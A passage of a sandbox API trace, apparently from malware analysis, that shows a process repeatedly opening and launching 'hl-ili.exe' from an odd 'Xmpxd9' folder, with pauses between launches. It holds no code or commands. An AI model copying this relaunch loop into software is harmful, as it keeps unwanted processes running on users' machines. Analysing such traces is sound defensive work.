(Handle=0x988) returned 0x0 [0319.324] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.324] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x988, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.324] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.324] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9e80) returned 1 [0319.324] NtClose (Handle=0x988) returned 0x0 [0319.326] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x970, hThread=0x988, dwProcessId=0x13c8, dwThreadId=0x1294), hNewToken=0x0) returned 1 [0319.349] Sleep (dwMilliseconds=0x1388) [0319.350] Sleep (dwMilliseconds=0x1388) [0319.352] Sleep (dwMilliseconds=0x1388) [0319.353] Sleep (dwMilliseconds=0x1388) [0319.355] Sleep (dwMilliseconds=0x1388) [0319.356] Sleep (dwMilliseconds=0x1388) [0319.358] Sleep (dwMilliseconds=0x1388) [0319.359] Sleep (dwMilliseconds=0x1388) [0319.364] Sleep (dwMilliseconds=0x1388) [0319.365] Sleep (dwMilliseconds=0x1388) [0319.367] Sleep (dwMilliseconds=0x1388) [0319.368] Sleep (dwMilliseconds=0x1388) [0319.370] Sleep (dwMilliseconds=0x1388) [0319.371] Sleep (dwMilliseconds=0x1388) [0319.373] Sleep (dwMilliseconds=0x1388) [0319.374] Sleep (dwMilliseconds=0x1388) [0319.381] Sleep (dwMilliseconds=0x1388) [0319.383] Sleep (dwMilliseconds=0x1388) [0319.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.385] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x984, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.385] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da740) returned 1 [0319.385] NtQueryInformationFile (in: FileHandle=0x984, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.385] NtClose (Handle=0x984) returned 0x0 [0319.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.385] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x984, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.386] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da580) returned 1 [0319.386] NtClose (Handle=0x984) returned 0x0 [0319.388] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x97c, hThread=0x984, dwProcessId=0xc30, dwThreadId=0x67c), hNewToken=0x0) returned 1 [0319.415] Sleep (dwMilliseconds=0x1388) [0319.416] Sleep (dwMilliseconds=0x1388) [0319.421] Sleep (dwMilliseconds=0x1388) [0319.422] Sleep (dwMilliseconds=0x1388) [0319.423] Sleep (dwMilliseconds=0x1388) [0319.430] Sleep (dwMilliseconds=0x1388) [0319.431] Sleep (dwMilliseconds=0x1388) [0319.432] Sleep (dwMilliseconds=0x1388) [0319.434] Sleep (dwMilliseconds=0x1388) [0319.435] Sleep (dwMilliseconds=0x1388) [0319.437] Sleep (dwMilliseconds=0x1388) [0319.439] Sleep (dwMilliseconds=0x1388) [0319.452] Sleep (dwMilliseconds=0x1388) [0319.453] Sleep (dwMilliseconds=0x1388) [0319.455] Sleep (dwMilliseconds=0x1388) [0319.460] Sleep (dwMilliseconds=0x1388) [0319.463] Sleep (dwMilliseconds=0x1388) [0319.465] Sleep (dwMilliseconds=0x1388) [0319.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.466] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x6ec, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.466] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.466] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9d30) returned 1 [0319.466] NtQueryInformationFile (in: FileHandle=0x6ec, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.466] NtClose (Handle=0x6ec) returned 0x0 [0319.467] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.467] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x6ec, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.467] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.467] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9470) returned 1 [0319.467] NtClose (Handle=0x6ec) returned 0x0 [0319.470] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0xf3c, hThread=0x6ec, dwProcessId=0x6c8, dwThreadId=0x6c4), hNewToken=0x0) returned 1 [0319.493] Sleep (dwMilliseconds=0x1388) [0319.495] Sleep (dwMilliseconds=0x1388) [0319.496] Sleep (dwMilliseconds=0x1388) [0319.498] Sleep (dwMilliseconds=0x1388) [0319.499] Sleep (dwMilliseconds=0x1388) [0319.501] Sleep (dwMilliseconds=0x1388) [0319.502] Sleep (dwMilliseconds=0x1388) [0319.504] Sleep (dwMilliseconds=0x1388) [0319.510] Sleep (dwMilliseconds=0x1388) [0319.512] Sleep (dwMilliseconds=0x1388) [0319.513] Sleep (dwMilliseconds=0x1388) [0319.515] Sleep (dwMilliseconds=0x1388) [0319.516] Sleep (dwMilliseconds=0x1388) [0319.518] Sleep (dwMilliseconds=0x1388) [0319.519] Sleep (dwMilliseconds=0x1388) [0319.522] Sleep (dwMilliseconds=0x1388) [0319.527] Sleep (dwMilliseconds=0x1388) [0319.529] Sleep (dwMilliseconds=0x1388) [0319.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.531] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x998, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.532] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1daac0) returned 1 [0319.532] NtQueryInformationFile (in: FileHandle=0x998, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.532] NtClose (Handle=0x998) returned 0x0 [0319.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.532] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x998, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.532] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da270) returned 1 [0319.532] NtClose (Handle=0x998) returned 0x0 [0319.535] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x980, hThread=0x998, dwProcessId=0xdd0, dwThreadId=0xa38), hNewToken=0x0) returned 1 [0319.557] Sleep (dwMilliseconds=0x1388) [0319.558] Sleep (dwMilliseconds=0x1388) [0319.560] Sleep (dwMilliseconds=0x1388) [0319.561] Sleep (dwMilliseconds=0x1388) [0319.563] Sleep (dwMilliseconds=0x1388) [0319.564] Sleep (dwMilliseconds=0x1388) [0319.566] Sleep (dwMilliseconds=0x1388) [0319.567] Sleep (dwMilliseconds=0x1388) [0319.572] Sleep (dwMilliseconds=0x1388) [0319.574] Sleep (dwMilliseconds=0x1388) [0319.577] Sleep (dwMilliseconds=0x1388) [0319.578] Sleep (dwMilliseconds=0x1388) [0319.580] Sleep (dwMilliseconds=0x1388) [0319.615] Sleep (dwMilliseconds=0x1388) [0319.620] Sleep (dwMilliseconds=0x1388) [0319.621] Sleep (dwMilliseconds=0x1388) [0319.623] Sleep (dwMilliseconds=0x1388) [0319.624] Sleep (dwMilliseconds=0x1388) [0319.626] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.626] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1d14, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.627] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.627] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9b70) returned 1 [0319.627] NtQueryInformationFile (in: FileHandle=0x1d14, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.627] NtClose (Handle=0x1d14) returned 0x0 [0319.627] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.627] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1d14, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.627] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.627] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da270) returned 1 [0319.627] NtClose (Handle=0x1d14) returned 0x0 [0319.630] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1e94, hThread=0x1d14, dwProcessId=0x610, dwThreadId=0x60c), hNewToken=0x0) returned 1 [0319.655] Sleep (dwMilliseconds=0x1388) [0319.657] Sleep (dwMilliseconds=0x1388) [0319.658] Sleep (dwMilliseconds=0x1388) [0319.660] Sleep (dwMilliseconds=0x1388) [0319.661] Sleep (dwMilliseconds=0x1388) [0319.663] Sleep (dwMilliseconds=0x1388) [0319.668] Sleep (dwMilliseconds=0x1388) [0319.669] Sleep (dwMilliseconds=0x1388) [0319.671] Sleep (dwMilliseconds=0x1388) [0319.672] Sleep (dwMilliseconds=0x1388) [0319.674] Sleep (dwMilliseconds=0x1388) [0319.676] Sleep (dwMilliseconds=0x1388) [0319.678] Sleep (dwMilliseconds=0x1388) [0319.679] Sleep (dwMilliseconds=0x1388) [0319.684] Sleep (dwMilliseconds=0x1388) [0319.686] Sleep (dwMilliseconds=0x1388) [0319.687] Sleep (dwMilliseconds=0x1388) [0319.689] Sleep (dwMilliseconds=0x1388) [0319.690] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.690] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1e24, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.691] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.691] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d96a0) returned 1 [0319.691] NtQueryInformationFile (in: FileHandle=0x1e24, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.691] NtClose (Handle=0x1e24) returned 0x0 [0319.691] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.691] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1e24, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.692] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.692] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9860) returned 1 [0319.692] NtClose (Handle=0x1e24) returned 0x0 [0319.694] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1de0, hThread=0x1e24, dwProcessId=0x8a4, dwThreadId=0xc34), hNewToken=0x0) returned 1 [0319.718] Sleep (dwMilliseconds=0x1388) [0319.719] Sleep (dwMilliseconds=0x1388) [0319.721] Sleep (dwMilliseconds=0x1388) [0319.726] Sleep (dwMilliseconds=0x1388) [0319.727] Sleep (dwMilliseconds=0x1388) [0319.732] Sleep (dwMilliseconds=0x1388) [0319.734] Sleep (dwMilliseconds=0x1388) [0319.735] Sleep (dwMilliseconds=0x1388) [0319.736] Sleep (dwMilliseconds=0x1388) [0319.738] Sleep (dwMilliseconds=0x1388) [0319.739] Sleep (dwMilliseconds=0x1388) [0319.742] Sleep (dwMilliseconds=0x1388) [0319.744] Sleep (dwMilliseconds=0x1388) [0319.749] Sleep (dwMilliseconds=0x1388) [0319.750] Sleep (dwMilliseconds=0x1388) [0319.753] Sleep (dwMilliseconds=0x1388) [0319.755] Sleep (dwMilliseconds=0x1388) [0319.757] Sleep (dwMilliseconds=0x1388) [0319.759] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.759] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1cc4, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.759] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.759] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9940) returned 1 [0319.759] NtQueryInformationFile (in: FileHandle=0x1cc4, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.759] NtClose (Handle=0x1cc4) returned 0x0 [0319.759] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.759] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1cc4, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.759] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.760] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9860) returned 1 [0319.760] NtClose (Handle=0x1cc4) returned 0x0 [0319.765] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files 